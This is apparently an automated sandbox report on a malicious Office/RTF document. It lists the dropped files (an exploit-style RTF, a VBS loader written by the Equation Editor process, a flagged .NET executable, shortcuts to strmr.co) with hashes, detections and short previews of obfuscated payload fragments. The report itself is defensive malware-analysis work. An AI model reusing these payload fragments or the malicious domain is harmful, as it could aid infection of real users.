                                                        Preview:{\rtf1..{\*\9tK3ug6SfiJBlo39Vt3WS6ar2vcROpN1MywcyDGhqQLa9xg1cP1BtfFg5Bc5eSCSPmbIvLuh2OtfipPq9uEL2LruDTpJQo4ySrisQ4yiN7MD7R9sFx}..{\44620688%=-)~61./$?$9;)?2.=&_-&~?@,+,^)'.~4&|?#6??~1;!=.+`@'1>!?7)?[5.?%|%.,28_^.*.4._?_1+0&%1%).$.~[[>&`??80'.*!.(-.|?~.?>`?0:`8$)~-;.#?+.~@;93-`--?>`.#?5)802?7]=9*;2*<^.+5:$971_:%7.?=.6.+=;?;4.~%,.?8?6?-?@.#8_2/6<8#.'[<?$:.)47356-,&|?>'(5#?|;[*@.$31/)*3%@%*3.36$5+'?'^4(,.,0@9;.%^^.+#..+?#;,>;-#.,112.?]].`.*:'<0..&%:~.7^%??95')5#4?%&.`,9,,.?02~/=]&-0([-|+~[|&31_79|%13%/..:?*^7.]4??.?/_6.;!?!~7;=..5%0;754?36>5!;=0.?9<;>^?.5&/8?;-36:_@.^0?;*0`|=;.?824?7%+%)2.>:)2=_*_/>?9_.<%),*^35''?|.?$?!~..|9!)?;?5]0&!4^?^./;~~`@#.8~)16>)?)+#5['%#(/~-&?1=,#~6^?%,+-?%.@=[)*230`.;!|%(.<?6??_(4,,7@:??~!5!?639@.6+!3>%3???.]%]%1.@68526&.5%:[@/.)~];^+.;<#)..~`.?81^*9.>|&90&60!!(.&??</_/`=<|+%.44~.?%??5(]._~/?(.-9?1+0.@3%?'>|.?.1!!:*,_!%9$]%=51?7)-^%$6$$<;*3:8&|:.<3%.`<%?@]:4@)?.*>?.-?6[|)6=4=))8%*~?*?13:`7?=_$7-|;|_%|4,*^+=7|0?8]0!)6><(/;.>%.$|$|??3$`2;2&_$>+`!)?1`<,]+;4=9+;;^[-

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethedifferentofpicture[1].vbs

                                                        Download File
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:ASCII text, with very long lines (65399), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):92431
                                                        Entropy (8bit):4.8789339351328405
                                                        Encrypted:false
                                                        SSDEEP:1536:35VT1rG9XgL21xU47L2HiUYxd9jd4Qyxsyf4SgfAw2zXdcp2bF+Z:JPG9pxh7L2SxKsu4SU0u2bI
                                                        MD5:7834CBAFCFAD72B1BDA091F3CCE8E997
                                                        SHA1:034AFCB22B254090084269FC8BCD68F64E4A85A8
                                                        SHA-256:AAC62555CF55C081E503636CF2D696AB33A789B9D10DDC8A9EF2ED8014890913
                                                        SHA-512:FA08EF7847F8F98A6E2442DB45935FBAA30D0C0CD26ABF457F8579FFDACE28D7851D5BBDC7630406C5FCFE74381241ACCD74B72E4DD79E194E1FD481BC06CFFF
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B830AA2.doc

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:Rich Text Format data, version 1
                                                        Category:dropped
                                                        Size (bytes):108966
                                                        Entropy (8bit):2.8471901685936154
                                                        Encrypted:false
                                                        SSDEEP:768:DdO5Q5s3pz7p3S2b9dbk4bSI+GdepBlMNIbnq8dEK7wC5Sbcif4:DwaGj9BjjdepBCNIbnfEGMbn4
                                                        MD5:D805F910E1756735E34523281088F2ED
                                                        SHA1:243F7B70A0FDE02F3AFD3B7D2FE99A786CB505DB
                                                        SHA-256:D43CC5A3D193C33295A70F6861EE2D0DDBEEB165AB106018F06A38CC5297EB57
                                                        SHA-512:37C6EDC231148AF4C65C77412F7672D12EC8504B3FB35BF6581E7A3405242A21D302AF97C6B898312750D8938D8C4B83299DC746A284F5F90E2B8E5B7CBA807F
                                                        Malicious:false
                                                        Yara Hits:
                                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B830AA2.doc, Author: ditekSHen
                                                        Reputation:low
                                                        Preview:{\rtf1..{\*\9tK3ug6SfiJBlo39Vt3WS6ar2vcROpN1MywcyDGhqQLa9xg1cP1BtfFg5Bc5eSCSPmbIvLuh2OtfipPq9uEL2LruDTpJQo4ySrisQ4yiN7MD7R9sFx}..{\44620688%=-)~61./$?$9;)?2.=&_-&~?@,+,^)'.~4&|?#6??~1;!=.+`@'1>!?7)?[5.?%|%.,28_^.*.4._?_1+0&%1%).$.~[[>&`??80'.*!.(-.|?~.?>`?0:`8$)~-;.#?+.~@;93-`--?>`.#?5)802?7]=9*;2*<^.+5:$971_:%7.?=.6.+=;?;4.~%,.?8?6?-?@.#8_2/6<8#.'[<?$:.)47356-,&|?>'(5#?|;[*@.$31/)*3%@%*3.36$5+'?'^4(,.,0@9;.%^^.+#..+?#;,>;-#.,112.?]].`.*:'<0..&%:~.7^%??95')5#4?%&.`,9,,.?02~/=]&-0([-|+~[|&31_79|%13%/..:?*^7.]4??.?/_6.;!?!~7;=..5%0;754?36>5!;=0.?9<;>^?.5&/8?;-36:_@.^0?;*0`|=;.?824?7%+%)2.>:)2=_*_/>?9_.<%),*^35''?|.?$?!~..|9!)?;?5]0&!4^?^./;~~`@#.8~)16>)?)+#5['%#(/~-&?1=,#~6^?%,+-?%.@=[)*230`.;!|%(.<?6??_(4,,7@:??~!5!?639@.6+!3>%3???.]%]%1.@68526&.5%:[@/.)~];^+.;<#)..~`.?81^*9.>|&90&60!!(.&??</_/`=<|+%.44~.?%??5(]._~/?(.-9?1+0.@3%?'>|.?.1!!:*,_!%9$]%=51?7)-^%$6$$<;*3:8&|:.<3%.`<%?@]:4@)?.*>?.-?6[|)6=4=))8%*~?*?13:`7?=_$7-|;|_%|4,*^+=7|0?8]0!)6><(/;.>%.$|$|??3$`2;2&_$>+`!)?1`<,]+;4=9+;;^[-

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9097DE45.emf

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                        Category:dropped
                                                        Size (bytes):3919640
                                                        Entropy (8bit):3.109586010517866
                                                        Encrypted:false
                                                        SSDEEP:12288:EHRgSGri2/oVyL00KH2sHliS4ri2/32h6001q:EHTGri2AVyLIH2sHR4ri2/2h6bq
                                                        MD5:AD5B063741C521880C04A4739CD29A12
                                                        SHA1:6634874A30DB4384B0EBF882261762FBF9B3212F
                                                        SHA-256:257E06D8A62128C65F47C0185407AAB2144DC47B387AE986728DD3CEDEF33DF2
                                                        SHA-512:CB6D041B561897B5107810C69E001977B9F168B4DFC734846794D9AB97B71BBD158025B690BF1F4ABB50E00EA7E23B4A57401EED30195F8852C47BFBA79EBE9B
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:....l............................H...@.. EMF......;.R.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!...............................................................................T...L.......................UU.A&..A............L.......................L..."...........!......................................................."...........!...............................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA53ED9B.emf

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                        Category:dropped
                                                        Size (bytes):3237596
                                                        Entropy (8bit):2.941908215680894
                                                        Encrypted:false
                                                        SSDEEP:6144:JNpuoh+quNeNpVAZSedri2/OZGIuKO9l8J07uGOE68J0YHmDodYJhuRJiTeJa8Kd:xHniS4ri2/CGuIl00Rh600YHY3R
                                                        MD5:886E5A977F3F446457EDB5D24FFD19A4
                                                        SHA1:4FA4E9045B1064F6FBE7171E8C2FEA86E650B338
                                                        SHA-256:A28F8FB1CFFFEE037FCF67A7858B4CE3155FCD18C268BBC4EE73BDE44C8BC478
                                                        SHA-512:B3B0815B234496BB7AFCDFD57750BEC9672886BD9B96E189F4662A100667EAF956158B36BF22370EAB86AD3E785FBD32A03A2565E83BF0C36F9DB8127E1DB840
                                                        Malicious:false
                                                        Preview:....l............................T...F.. EMF.....f1.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{081357E4-4C85-4436-B3DC-01EDA5DDF893}.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):13312
                                                        Entropy (8bit):5.799722121763575
                                                        Encrypted:false
                                                        SSDEEP:192:fRxPtIr6jV2fP0Q9r6jV2UP05r6jV2UP99r6jV2:ZxPk60Phd6/PE6/Pb6
                                                        MD5:A8C5FC488DE845011862CE10048F3AB4
                                                        SHA1:DE2AAD47324A30BF2B86A4F1D5F41118BA7A0163
                                                        SHA-256:6A096AF87883E72F4E2DFA18313C3D96E5F90C18BB05B28CFF031CE0A9CA50AF
                                                        SHA-512:85C6450C7AAB09C261E9C558DFB1845E9BBD84EE85AB35298711AEEC00613F280820150EECB18266A40AF314F4CE458745AC77C9BD40E69ACC160C75A240C3C6
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{190CC976-8CEE-4CA6-B93D-6EB05B0D4ECE}.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1024
                                                        Entropy (8bit):0.05390218305374581
                                                        Encrypted:false
                                                        SSDEEP:3:ol3lYdn:4Wn
                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{28E55565-B76A-44F2-9439-5AEC7371B4E8}.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16896
                                                        Entropy (8bit):3.5808522768349413
                                                        Encrypted:false
                                                        SSDEEP:384:Q/VXbEoRIdt1LMnoeC26GFYQuLJa18JRdZv8gk8J2+Dgrg:Q/VbIAnoeC26AUU18Fq58J2drg
                                                        MD5:713B0001AD1DAFF84ACAD5592F784EDD
                                                        SHA1:BD5CBC19A7DE9F7E89A8E674D6CFF846EBAAA1D5
                                                        SHA-256:19CC03450F0AE47E79F3C3FABF5B4A556A2FA7B2AA90692B30C93977ACFC3ADE
                                                        SHA-512:A224DC3446D91666C634E45AF53CE058740200C630C633AB49E7F5E8E4573C86D2C7E5DECD8BB886F696A46A4B35A12FC455FFCF383C56EA04D8F63749E47AAD
                                                        Malicious:false
                                                        Preview:4.6.2.0.6.8.8.%.=.-.).~.6.1.../.$.?.$.9.;.).?.2...=.&._.-.&.~.?.@.,.+.,.^.).'...~.4.&.|.?.#.6.?.?.~.1.;.!.=...+.`.@.'.1.>.!.?.7.).?.[.5...?.%.|.%...,.2.8._.^...*...4..._.?._.1.+.0.&.%.1.%.)...$...~.[.[.>.&.`.?.?.8.0.'...*.!...(.-...|.?.~...?.>.`.?.0.:.`.8.$.).~.-.;...#.?.+...~.@.;.9.3.-.`.-.-.?.>.`...#.?.5.).8.0.2.?.7.].=.9.*.;.2.*.<.^...+.5.:.$.9.7.1._.:.%.7...?.=...6...+.=.;.?.;.4...~.%.,...?.8.?.6.?.-.?.@...#.8._.2./.6.<.8.#...'.[.<.?.$.:...).4.7.3.5.6.-.,.&.|.?.>.'.(.5.#.?.|.;.[.*.@...$.3.1./.).*.3.%.@.%.*.3...3.6.$.5.+.'.?.'.^.4.(.,...,.0.@.9.;...%.^.^...+.#.....+.?.#.;.,.>.;.-.#...,.1.1.2...?.].]...`...*.:.'.<.0.....&.%.:.~...7.^.%.?.?.9.5.'.).5.#.4.?.%.&...`.,.9.,.,...?.0.2.~./.=.].&.-.0.(.[.-.|.+.~.[.|.&.3.1._.7.9.|.%.1.3.%./.....:.?.*.^.7...].4.?.?...?./._.6...;.!.?.!.~.7.;.=.....5.%.0.;.7.5.4.?.3.6.>.5.!.;.=.0...?.9.<.;.>.^.?...5.&./.8.?.;.-.3.6.:._.@...^.0.?.;.*.0.`.|.=.;...?.8.2.4.?.7.%.+.%.).2...>.:.).2.=._.*._./.>.?.9._...<.%.).,.*.^.3.5.'.'.?.|...?.$.?.!.~.....|.9.!.).?.

                                                        C:\Users\user\AppData\Local\Temp\temp_executable.exe

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):49152
                                                        Entropy (8bit):6.632984721949493
                                                        Encrypted:false
                                                        SSDEEP:768:Ua9FDkXneHCBXyDMLNe9rotBMx251CBXWZBiGRO4TjPZcVP+LWcwTQ1qsL8:Ua92XeiBCd9/o+XWgGRO4HPmN7TQ1tL8
                                                        MD5:3E01AC27E853080CA5C92470DF3F738C
                                                        SHA1:41B6C3DF03856DDF7A5BA505900A9499A6ABADA1
                                                        SHA-256:E350330729257731AC3E4CB80CFCB243F8FD629A2AB5BC11D7A1E89B3945C716
                                                        SHA-512:2D4A0A638274A2A3B1B5E6A48E7BFC9A96C8FC113E49A6D89BD4ED3B63B3B3A9410258AA47DE79741C55ADAF24DE417D474CA5971784684870FA469F7C017DFF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..f..............0.................. ........@.. ....................................`.....................................W........;...........................I............................................... ............... ..H............text....~... ...................... ..`.reloc..............................@..B.rsrc....;.......<..................@..@........................H.......,J...S...........@..............................................".(.....*....0...........($.....*....0..[........~....~t.......,@.E.........-......&..("...%&(....%&(....%&(....%&(....%&........~.....+..*..0...........~.....+..*..0.................*.0...........(N...*..0...........(O....*.0..........s....(....%&(....%&.....*....0...........~.....+..*..0..K.......(...........sP...(....(....%&.......sP...(....(\.....(....%&..(h...%&.....*..0...........($...*..0..........

                                                        C:\Users\user\AppData\Local\Temp\{0FD25480-6028-43C6-B741-703F745F41E8}

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):131072
                                                        Entropy (8bit):0.02566653274851145
                                                        Encrypted:false
                                                        SSDEEP:6:I3DPc1i09hvxggLRzCip8sFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPkiiNfrp9bvYg3J/
                                                        MD5:09CE1A9B707022FF6386E8EC1B8FDABF
                                                        SHA1:2CAA2F3B7C000963DEF058CE14B870BCC5C66F23
                                                        SHA-256:267028E1CC86E8A7453245D68CD52DA98AAD39A03654DE09D01956D268690CA3
                                                        SHA-512:F781F7D3EBC0FC1B8BBA4ED932773AAD1B4A4E13814EFC95372BE0C7AF706DA8EFEA699F6E24426DE718420D7D1A94FDF5AF9ED69A96C2A79852DD13D4A9607E
                                                        Malicious:false
                                                        Preview:......M.eFy...z..8..H..s-e.oS,...X.F...Fa.q............................d..y.N...tpq..........,I..C...@a........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\{7554D279-B5C4-4974-9960-2EBCC8B297DE}

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):131072
                                                        Entropy (8bit):0.025564149139645997
                                                        Encrypted:false
                                                        SSDEEP:6:I3DPcD8xNHvxggLRFOX4TwPnN+RXv//4tfnRujlw//+GtluJ/eRuj:I3DPRgIM2vYg3J/
                                                        MD5:7F9B4590D8E68E372ECF4114EB9DE982
                                                        SHA1:4D6C1A2D3053A02BBEE7D9D2EC914D28439FC1C0
                                                        SHA-256:46F36F124155E25D2EFCF1934C1AF98F58345F5D9345A138646E6B083E27D6CE
                                                        SHA-512:7780F8A736A2EE32D97D6E48AA2A2D5EA6BAF98585EB89F816AFB443FDF9A56EBA38A63702A051DAF30BAFAA2C0F96CA2CCCC10467EFC642D15B2ACF14EC1150
                                                        Malicious:false
                                                        Preview:......M.eFy...zs..A\?@...a..NS,...X.F...Fa.q............................RW.k.w.F..d.!..............".F.G..c(#c.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\~DF548A65E297CEF6BA.TMP

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):339968
                                                        Entropy (8bit):7.768246762015716
                                                        Encrypted:false
                                                        SSDEEP:6144:hTXU+xUOA8HH6InGM7HRgNbnFto8++wXbgcl0WDL4yQfL6fkAv5EE:hT5UOAsHFnd7HeT/o8gg8Rsfe8sEE
                                                        MD5:996B56C8B888FAAE21647A151EED4D0F
                                                        SHA1:0D6BA4DEE1DAB555F4476C755FDF2DAA5DC232E3
                                                        SHA-256:98B214BC85AA3ADF0BC9DFA05E5FE20B4F03C552F87801F1C79443DB4196BFDE
                                                        SHA-512:85F2963AC7DF174002AF804E2D171A8F6E5C59F25F9094306CFB7EB098FD5187FB07C77A783ABB382954918D8DDD4CCA1E8883A520425C9BA2CD7BB898BCDF33
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\~DF7D9593F7751AD48D.TMP

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):333824
                                                        Entropy (8bit):7.884335964134364
                                                        Encrypted:false
                                                        SSDEEP:6144:MTXU+xUOA8HH6InGM7HRgNbnFto8++wXbgcl0WDL4yQfL6fkAv5EE:MT5UOAsHFnd7HeT/o8gg8Rsfe8sEE
                                                        MD5:06EB778904EA0E0EF73CB25AF9BE4AA0
                                                        SHA1:76E2DDB85910B2E2B7FB59B9D47621311678EAE2
                                                        SHA-256:CA9A2973CB96D8C15C127C98F67EEAA8C3BF05AC42B3BABE1CD5813159A2BE0E
                                                        SHA-512:91C545451A4C85EA096D76CB45A7E99419001059DDCD39125789B18E52B538DD63997E77F2D8EB87F257707E5826F500BE367FAD9C9FDC4067DDD10B16930CEC
                                                        Malicious:false
                                                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                        C:\Users\user\AppData\Local\Temp\~DFEA601F2FA931FC34.TMP

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bg7UYE.url

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:MS Windows 95 Internet shortcut text (URL=<https://strmr.co/Bg7UYE>), ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):49
                                                        Entropy (8bit):4.586008375613847
                                                        Encrypted:false
                                                        SSDEEP:3:HRAbABGQYm2fk6ZeJd:HRYFVm4kX
                                                        MD5:4DC6469FC624862123C3F2D65A18C9A1
                                                        SHA1:C165E365AFDE22247A65BC455B979F1870420F1B
                                                        SHA-256:C1944E6DF93A2D0BEE05DFC64040A7C358833FA191A58AE4F3B25EBA44FDECDF
                                                        SHA-512:4422DD33816CC5EBD6596EE11FCA435FD4196F4133DDB89AC4FC71AE08E51A480E0BF61430302884FE094D3908CAABBDAC374E060A519105B6A3128B22DC7297
                                                        Malicious:true
                                                        Preview:[InternetShortcut]..URL=https://strmr.co/Bg7UYE..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):41
                                                        Entropy (8bit):4.366596139176847
                                                        Encrypted:false
                                                        SSDEEP:3:bD+8OCy6ZW4y:b68OCy644y
                                                        MD5:52F7D3157AFE59F49F093122645DD9B2
                                                        SHA1:4105CFAAF39513A775612FEC89B9EEBE0C83B8B1
                                                        SHA-256:FE3D25CD09253E544498F160BE2C9869BA45F2319ECF2D6DB5A85D4D69823907
                                                        SHA-512:AB7AF5DB816040D9087ED457FDE000E29D29A1A41A5906E040CD53C0FD0B8B3AE5C91F9258DD02B736DBF9E125591A9969B98BF611EF2D2B9CF9C66C3668CABD
                                                        Malicious:false
                                                        Preview:[folders]..Bg7UYE.url=0..strmr.co.url=0..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\strmr.co.url

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:MS Windows 95 Internet shortcut text (URL=<https://strmr.co/>), ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):43
                                                        Entropy (8bit):4.300535174316826
                                                        Encrypted:false
                                                        SSDEEP:3:HRAbABGQYm2fk6ZD:HRYFVm4kE
                                                        MD5:6B0CC25F2A1C5022663F9504B1978D43
                                                        SHA1:524A2AE756F4DB590A6F3981312C936F8B64B6D2
                                                        SHA-256:462CADC2A9625BB09682AAC27CD23FA484AE4638805E1ED16F0B82DDCD58EEB7
                                                        SHA-512:7DF469932CF64B9A65EE01878C68F16E56C4C1514D1A449754C73D5F840A0556CC7D2CE521F8444F0314B708C8EF3111C88AE272479077D7F341DA96DBFEAF13
                                                        Malicious:true
                                                        Preview:[InternetShortcut]..URL=https://strmr.co/..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.503835550707525
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                                        MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                                        SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                                        SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                                        SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                        C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs

                                                        Download File
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:ASCII text, with very long lines (65399), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):92431
                                                        Entropy (8bit):4.8789339351328405
                                                        Encrypted:false
                                                        SSDEEP:1536:35VT1rG9XgL21xU47L2HiUYxd9jd4Qyxsyf4SgfAw2zXdcp2bF+Z:JPG9pxh7L2SxKsu4SU0u2bI
                                                        MD5:7834CBAFCFAD72B1BDA091F3CCE8E997
                                                        SHA1:034AFCB22B254090084269FC8BCD68F64E4A85A8
                                                        SHA-256:AAC62555CF55C081E503636CF2D696AB33A789B9D10DDC8A9EF2ED8014890913
                                                        SHA-512:FA08EF7847F8F98A6E2442DB45935FBAA30D0C0CD26ABF457F8579FFDACE28D7851D5BBDC7630406C5FCFE74381241ACCD74B72E4DD79E194E1FD481BC06CFFF
                                                        Malicious:true
